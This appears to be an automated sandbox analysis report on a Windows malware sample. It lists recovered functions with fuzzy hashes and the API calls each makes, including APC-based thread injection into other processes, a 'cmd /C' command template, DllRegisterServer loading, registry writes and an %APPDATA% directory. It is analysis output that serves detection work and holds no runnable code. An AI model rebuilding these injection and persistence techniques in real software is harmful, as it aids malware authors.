  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
